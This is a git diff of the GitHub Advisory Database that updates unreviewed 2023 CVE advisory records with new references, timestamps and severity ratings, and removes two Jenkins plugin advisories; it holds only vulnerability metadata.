b/advisories/unreviewed/2023/07/GHSA-cgvp-6hhh-fqwh/GHSA-cgvp-6hhh-fqwh.json index b07b85b1957b8..1d48b79afb8fa 100644 --- a/advisories/unreviewed/2023/07/GHSA-cgvp-6hhh-fqwh/GHSA-cgvp-6hhh-fqwh.json +++ b/advisories/unreviewed/2023/07/GHSA-cgvp-6hhh-fqwh/GHSA-cgvp-6hhh-fqwh.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0448" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0575" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-3567" diff --git a/advisories/unreviewed/2023/07/GHSA-fcg7-9x44-gx43/GHSA-fcg7-9x44-gx43.json b/advisories/unreviewed/2023/07/GHSA-fcg7-9x44-gx43/GHSA-fcg7-9x44-gx43.json index e15f8741efd8b..2d09d15e5861b 100644 --- a/advisories/unreviewed/2023/07/GHSA-fcg7-9x44-gx43/GHSA-fcg7-9x44-gx43.json +++ b/advisories/unreviewed/2023/07/GHSA-fcg7-9x44-gx43/GHSA-fcg7-9x44-gx43.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0003/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5480" diff --git a/advisories/unreviewed/2023/07/GHSA-hpqg-7fjp-436p/GHSA-hpqg-7fjp-436p.json b/advisories/unreviewed/2023/07/GHSA-hpqg-7fjp-436p/GHSA-hpqg-7fjp-436p.json index 5a9fe9314d1c4..c60c74b9d3550 100644 --- a/advisories/unreviewed/2023/07/GHSA-hpqg-7fjp-436p/GHSA-hpqg-7fjp-436p.json +++ b/advisories/unreviewed/2023/07/GHSA-hpqg-7fjp-436p/GHSA-hpqg-7fjp-436p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hpqg-7fjp-436p", - "modified": "2023-07-27T15:30:34Z", + "modified": "2024-02-04T09:30:41Z", "published": "2023-07-14T12:30:21Z", "aliases": [ "CVE-2023-2975" @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a83f0c958811f07e0d11dfc6b5a6a98edfd5bdc" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230725-0004/" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-287" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-07-14T12:15:09Z" diff --git a/advisories/unreviewed/2023/07/GHSA-jx73-f6rp-8fxv/GHSA-jx73-f6rp-8fxv.json b/advisories/unreviewed/2023/07/GHSA-jx73-f6rp-8fxv/GHSA-jx73-f6rp-8fxv.json index cebc1b4e549f8..a9015b1d991bc 100644 --- a/advisories/unreviewed/2023/07/GHSA-jx73-f6rp-8fxv/GHSA-jx73-f6rp-8fxv.json +++ b/advisories/unreviewed/2023/07/GHSA-jx73-f6rp-8fxv/GHSA-jx73-f6rp-8fxv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jx73-f6rp-8fxv", - "modified": "2023-07-06T21:14:56Z", + "modified": "2024-02-07T12:30:25Z", "published": "2023-07-06T21:14:56Z", "aliases": [ "CVE-2022-47436" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-10T11:15:10Z" diff --git a/advisories/unreviewed/2023/07/GHSA-mfwc-hx97-869v/GHSA-mfwc-hx97-869v.json b/advisories/unreviewed/2023/07/GHSA-mfwc-hx97-869v/GHSA-mfwc-hx97-869v.json index bfa0159c6d194..6fbb758808963 100644 --- a/advisories/unreviewed/2023/07/GHSA-mfwc-hx97-869v/GHSA-mfwc-hx97-869v.json +++ b/advisories/unreviewed/2023/07/GHSA-mfwc-hx97-869v/GHSA-mfwc-hx97-869v.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0423" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0580" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2022-2127" diff --git a/advisories/unreviewed/2023/07/GHSA-p4m9-r3rr-cx92/GHSA-p4m9-r3rr-cx92.json b/advisories/unreviewed/2023/07/GHSA-p4m9-r3rr-cx92/GHSA-p4m9-r3rr-cx92.json index d07b646deaf8c..a483d2fdc85b9 100644 --- a/advisories/unreviewed/2023/07/GHSA-p4m9-r3rr-cx92/GHSA-p4m9-r3rr-cx92.json +++ b/advisories/unreviewed/2023/07/GHSA-p4m9-r3rr-cx92/GHSA-p4m9-r3rr-cx92.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p4m9-r3rr-cx92", - "modified": "2023-07-24T15:30:27Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-07-24T15:30:27Z", "aliases": [ "CVE-2023-3863" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0002/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5480" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-07-24T15:15:09Z" diff --git a/advisories/unreviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json b/advisories/unreviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json deleted file mode 100644 index 74c78a687d920..0000000000000 --- a/advisories/unreviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pvjf-4hfg-wr84", - "modified": "2023-07-31T18:30:21Z", - "published": "2023-07-26T15:30:57Z", - "aliases": [ - "CVE-2023-39152" - ], - "details": "Always-incorrect control flow implementation in Jenkins Gradle Plugin 2.8 may result in credentials not being masked (i.e., replaced with asterisks) in the build log in some circumstances.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39152" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-07-26/#SECURITY-3208" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/07/26/2" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-670" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-07-26T14:15:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json b/advisories/unreviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json deleted file mode 100644 index f7ba45f8e60d7..0000000000000 --- a/advisories/unreviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-px39-5h8c-j3c8", - "modified": "2023-07-19T18:30:56Z", - "published": "2023-07-19T18:30:56Z", - "aliases": [ - "CVE-2023-32262" - ], - "details": "\nA potential vulnerability has been identified in the Micro Focus Dimensions CM Plugin for Jenkins. The vulnerability allows attackers with Item/Configure permission to access and capture credentials they are not entitled to.\nSee the following Jenkins security advisory for details: * https://www.jenkins.io/security/advisory/2023-06-14/ https://www.jenkins.io/security/advisory/2023-06-14/ \n\n\n\n\n", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32262" - }, - { - "type": "WEB", - "url": "https://plugins.jenkins.io/dimensionsscm/" - }, - { - "type": "WEB", - "url": "https://portal.microfocus.com/s/article/KM000019298" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-06-14/" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-07-19T16:15:09Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/07/GHSA-r827-5p5r-w6f5/GHSA-r827-5p5r-w6f5.json b/advisories/unreviewed/2023/07/GHSA-r827-5p5r-w6f5/GHSA-r827-5p5r-w6f5.json index fad8b97e1c709..26b8fac5feee7 100644 --- a/advisories/unreviewed/2023/07/GHSA-r827-5p5r-w6f5/GHSA-r827-5p5r-w6f5.json +++ b/advisories/unreviewed/2023/07/GHSA-r827-5p5r-w6f5/GHSA-r827-5p5r-w6f5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r827-5p5r-w6f5", - "modified": "2023-07-06T19:24:05Z", + "modified": "2024-02-01T18:31:04Z", "published": "2023-07-06T19:24:05Z", "aliases": [ "CVE-2022-2808" ], "details": "Algan Yazılım Prens Student Information System product has an authenticated Insecure Direct Object Reference (IDOR) vulnerability. ", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-639" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2022-12-02T12:15:00Z" diff --git a/advisories/unreviewed/2023/07/GHSA-rjh9-46c2-6h7f/GHSA-rjh9-46c2-6h7f.json b/advisories/unreviewed/2023/07/GHSA-rjh9-46c2-6h7f/GHSA-rjh9-46c2-6h7f.json index 6c7ccb3bbe976..21d7b7daf078e 100644 --- a/advisories/unreviewed/2023/07/GHSA-rjh9-46c2-6h7f/GHSA-rjh9-46c2-6h7f.json +++ b/advisories/unreviewed/2023/07/GHSA-rjh9-46c2-6h7f/GHSA-rjh9-46c2-6h7f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rjh9-46c2-6h7f", - "modified": "2023-07-06T21:14:55Z", + "modified": "2024-02-01T18:31:06Z", "published": "2023-07-06T21:14:55Z", "aliases": [ "CVE-2023-25833" @@ -32,9 +32,10 @@ ], "database_specific": { "cwe_ids": [ + "CWE-79", "CWE-80" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-10T02:15:08Z" diff --git a/advisories/unreviewed/2023/07/GHSA-v4mv-7g6h-5vh8/GHSA-v4mv-7g6h-5vh8.json b/advisories/unreviewed/2023/07/GHSA-v4mv-7g6h-5vh8/GHSA-v4mv-7g6h-5vh8.json index e92c7a8113599..16c636516493d 100644 --- a/advisories/unreviewed/2023/07/GHSA-v4mv-7g6h-5vh8/GHSA-v4mv-7g6h-5vh8.json +++ b/advisories/unreviewed/2023/07/GHSA-v4mv-7g6h-5vh8/GHSA-v4mv-7g6h-5vh8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v4mv-7g6h-5vh8", - "modified": "2024-01-25T21:32:11Z", + "modified": "2024-01-30T18:30:18Z", "published": "2023-07-24T18:30:44Z", "aliases": [ "CVE-2023-3812" @@ -81,6 +81,26 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0554" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0562" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0563" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0575" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0593" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-3812" diff --git a/advisories/unreviewed/2023/07/GHSA-vr3g-637q-4rh6/GHSA-vr3g-637q-4rh6.json b/advisories/unreviewed/2023/07/GHSA-vr3g-637q-4rh6/GHSA-vr3g-637q-4rh6.json index 481ccdea3d5f9..dc8738b328cd8 100644 --- a/advisories/unreviewed/2023/07/GHSA-vr3g-637q-4rh6/GHSA-vr3g-637q-4rh6.json +++ b/advisories/unreviewed/2023/07/GHSA-vr3g-637q-4rh6/GHSA-vr3g-637q-4rh6.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lore.kernel.org/netfilter-devel/20230705121627.GC19489@breakpoint.cc/T/" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0001/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5453" diff --git a/advisories/unreviewed/2023/07/GHSA-xf5h-8pqw-mggq/GHSA-xf5h-8pqw-mggq.json b/advisories/unreviewed/2023/07/GHSA-xf5h-8pqw-mggq/GHSA-xf5h-8pqw-mggq.json index 25fee44c18d6b..a69a1c13c28f8 100644 --- a/advisories/unreviewed/2023/07/GHSA-xf5h-8pqw-mggq/GHSA-xf5h-8pqw-mggq.json +++ b/advisories/unreviewed/2023/07/GHSA-xf5h-8pqw-mggq/GHSA-xf5h-8pqw-mggq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xf5h-8pqw-mggq", - "modified": "2023-07-06T21:14:55Z", + "modified": "2024-02-01T15:30:24Z", "published": "2023-07-06T21:14:55Z", "aliases": [ "CVE-2023-25832" @@ -34,7 +34,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-05-09T21:15:11Z" diff --git a/advisories/unreviewed/2023/08/GHSA-2965-8m5f-3hph/GHSA-2965-8m5f-3hph.json b/advisories/unreviewed/2023/08/GHSA-2965-8m5f-3hph/GHSA-2965-8m5f-3hph.json index 7a5ecbbc59bff..27b3c2ec53230 100644 --- a/advisories/unreviewed/2023/08/GHSA-2965-8m5f-3hph/GHSA-2965-8m5f-3hph.json +++ b/advisories/unreviewed/2023/08/GHSA-2965-8m5f-3hph/GHSA-2965-8m5f-3hph.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2965-8m5f-3hph", - "modified": "2023-08-22T15:30:20Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4368" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-2gmm-4f9j-mw4p/GHSA-2gmm-4f9j-mw4p.json b/advisories/unreviewed/2023/08/GHSA-2gmm-4f9j-mw4p/GHSA-2gmm-4f9j-mw4p.json index e68817ccf7ea2..ddf162fd76148 100644 --- a/advisories/unreviewed/2023/08/GHSA-2gmm-4f9j-mw4p/GHSA-2gmm-4f9j-mw4p.json +++ b/advisories/unreviewed/2023/08/GHSA-2gmm-4f9j-mw4p/GHSA-2gmm-4f9j-mw4p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2gmm-4f9j-mw4p", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:17Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3730" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:31Z" diff --git a/advisories/unreviewed/2023/08/GHSA-3p85-44fv-28jc/GHSA-3p85-44fv-28jc.json b/advisories/unreviewed/2023/08/GHSA-3p85-44fv-28jc/GHSA-3p85-44fv-28jc.json index 23ab938498991..169560bb1e7af 100644 --- a/advisories/unreviewed/2023/08/GHSA-3p85-44fv-28jc/GHSA-3p85-44fv-28jc.json +++ b/advisories/unreviewed/2023/08/GHSA-3p85-44fv-28jc/GHSA-3p85-44fv-28jc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3p85-44fv-28jc", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4366" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:13Z" diff --git a/advisories/unreviewed/2023/08/GHSA-4grv-wgvh-8x82/GHSA-4grv-wgvh-8x82.json b/advisories/unreviewed/2023/08/GHSA-4grv-wgvh-8x82/GHSA-4grv-wgvh-8x82.json index 44709cc3aaca0..b6c6cb82fd778 100644 --- a/advisories/unreviewed/2023/08/GHSA-4grv-wgvh-8x82/GHSA-4grv-wgvh-8x82.json +++ b/advisories/unreviewed/2023/08/GHSA-4grv-wgvh-8x82/GHSA-4grv-wgvh-8x82.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4grv-wgvh-8x82", - "modified": "2023-08-23T00:30:25Z", + "modified": "2024-02-01T18:31:06Z", "published": "2023-08-16T15:30:17Z", "aliases": [ "CVE-2023-39975" @@ -33,6 +33,14 @@ "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230915-0014/" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0005/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0008/" + }, { "type": "WEB", "url": "https://web.mit.edu/kerberos/www/advisories/" @@ -42,7 +50,7 @@ "cwe_ids": [ "CWE-415" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-16T15:15:11Z" diff --git a/advisories/unreviewed/2023/08/GHSA-543q-ph8q-rffh/GHSA-543q-ph8q-rffh.json b/advisories/unreviewed/2023/08/GHSA-543q-ph8q-rffh/GHSA-543q-ph8q-rffh.json index 3ecfa447905bc..decbcd5033bff 100644 --- a/advisories/unreviewed/2023/08/GHSA-543q-ph8q-rffh/GHSA-543q-ph8q-rffh.json +++ b/advisories/unreviewed/2023/08/GHSA-543q-ph8q-rffh/GHSA-543q-ph8q-rffh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-543q-ph8q-rffh", - "modified": "2023-08-21T18:31:23Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4361" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:12Z" diff --git a/advisories/unreviewed/2023/08/GHSA-5gvr-xr3v-5q9w/GHSA-5gvr-xr3v-5q9w.json b/advisories/unreviewed/2023/08/GHSA-5gvr-xr3v-5q9w/GHSA-5gvr-xr3v-5q9w.json index f987803723304..223731eebffc3 100644 --- a/advisories/unreviewed/2023/08/GHSA-5gvr-xr3v-5q9w/GHSA-5gvr-xr3v-5q9w.json +++ b/advisories/unreviewed/2023/08/GHSA-5gvr-xr3v-5q9w/GHSA-5gvr-xr3v-5q9w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5gvr-xr3v-5q9w", - "modified": "2023-08-24T06:30:16Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4360" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:12Z" diff --git a/advisories/unreviewed/2023/08/GHSA-5ppf-43g5-3hh2/GHSA-5ppf-43g5-3hh2.json b/advisories/unreviewed/2023/08/GHSA-5ppf-43g5-3hh2/GHSA-5ppf-43g5-3hh2.json index 2a6d3a9864c6f..311b465a2287b 100644 --- a/advisories/unreviewed/2023/08/GHSA-5ppf-43g5-3hh2/GHSA-5ppf-43g5-3hh2.json +++ b/advisories/unreviewed/2023/08/GHSA-5ppf-43g5-3hh2/GHSA-5ppf-43g5-3hh2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5ppf-43g5-3hh2", - "modified": "2023-08-22T18:31:31Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:32Z", "aliases": [ "CVE-2023-2312" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:10Z" diff --git a/advisories/unreviewed/2023/08/GHSA-5v4h-r3vp-3g7w/GHSA-5v4h-r3vp-3g7w.json b/advisories/unreviewed/2023/08/GHSA-5v4h-r3vp-3g7w/GHSA-5v4h-r3vp-3g7w.json index 260b4554e34c8..0608aa8a8ce1c 100644 --- a/advisories/unreviewed/2023/08/GHSA-5v4h-r3vp-3g7w/GHSA-5v4h-r3vp-3g7w.json +++ b/advisories/unreviewed/2023/08/GHSA-5v4h-r3vp-3g7w/GHSA-5v4h-r3vp-3g7w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5v4h-r3vp-3g7w", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:18Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3737" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:33Z" diff --git a/advisories/unreviewed/2023/08/GHSA-6994-5wq3-gpjv/GHSA-6994-5wq3-gpjv.json b/advisories/unreviewed/2023/08/GHSA-6994-5wq3-gpjv/GHSA-6994-5wq3-gpjv.json index bf27b5c44e837..f95047c79a836 100644 --- a/advisories/unreviewed/2023/08/GHSA-6994-5wq3-gpjv/GHSA-6994-5wq3-gpjv.json +++ b/advisories/unreviewed/2023/08/GHSA-6994-5wq3-gpjv/GHSA-6994-5wq3-gpjv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6994-5wq3-gpjv", - "modified": "2023-08-31T18:30:28Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-29T21:30:21Z", "aliases": [ "CVE-2023-4572" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5487" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-29T20:15:10Z" diff --git a/advisories/unreviewed/2023/08/GHSA-6cx7-2m7q-5fh3/GHSA-6cx7-2m7q-5fh3.json b/advisories/unreviewed/2023/08/GHSA-6cx7-2m7q-5fh3/GHSA-6cx7-2m7q-5fh3.json index f13b9de408536..3dc6b069d3799 100644 --- a/advisories/unreviewed/2023/08/GHSA-6cx7-2m7q-5fh3/GHSA-6cx7-2m7q-5fh3.json +++ b/advisories/unreviewed/2023/08/GHSA-6cx7-2m7q-5fh3/GHSA-6cx7-2m7q-5fh3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6cx7-2m7q-5fh3", - "modified": "2023-08-24T06:30:16Z", + "modified": "2024-01-31T18:31:19Z", "published": "2023-08-15T18:31:33Z", "aliases": [ "CVE-2023-4357" @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCFEK63FUHFXZH5MSG6TNQOXMQWM4M5S/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5479" @@ -46,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-15T18:15:12Z" diff --git a/advisories/unreviewed/2023/08/GHSA-6f46-9vvr-v3j5/GHSA-6f46-9vvr-v3j5.json b/advisories/unreviewed/2023/08/GHSA-6f46-9vvr-v3j5/GHSA-6f46-9vvr-v3j5.json index de1864a57ca65..685e8c074ee5a 100644 --- a/advisories/unreviewed/2023/08/GHSA-6f46-9vvr-v3j5/GHSA-6f46-9vvr-v3j5.json +++ b/advisories/unreviewed/2023/08/GHSA-6f46-9vvr-v3j5/GHSA-6f46-9vvr-v3j5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6f46-9vvr-v3j5", - "modified": "2023-08-04T06:30:19Z", + "modified": "2024-01-31T18:31:17Z", "published": "2023-08-02T00:30:39Z", "aliases": [ "CVE-2023-3732" @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PQKT7EGDD2P3L7S3NXEDDRCPK4NNZNWJ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/174223/Chrome-IPCZ-FragmentDescriptors-Missing-Validation.html" @@ -42,7 +46,7 @@ "cwe_ids": [ "CWE-787" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-08-01T23:15:32Z" diff --git a/advisories/unreviewed/2023/08/GHSA-6j3m-7hm6-qjrx/GHSA-6j3m-7hm6-qjrx.json b/advisories/unreviewed/2023/08/GHSA-6j3m-7hm6-qjrx/GHSA-6j3m-7hm6-qjrx.json index 3346513775d65..f4f1c21c2f845 100644 --- a/advisories/unreviewed/2023/08/GHSA-6j3m-7hm6-qjrx/GHSA-6j3m-7hm6-qjrx.json +++ b/advisories/unreviewed/2023/08/GHSA-6j3m-7hm6-qjrx/GHSA-6j3m-7hm6-qjrx.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5467" diff --git a/advisories/unreviewed/2023/08/GHSA-6rcq-9f69-78p4/GHSA-6rcq-9f69-78p4.json b/advisories/unreviewed/2023/08/GHSA-6rcq-9f69-78p4/GHSA-6rcq-9f69-78p4.json index cc2a07a9bdaf3..ccabc6cf087b5 100644 --- a/advisories/unreviewed/2023/08/GHSA-6rcq-9f69-78p4/GHSA-6rcq-9f69-78p4.json +++ 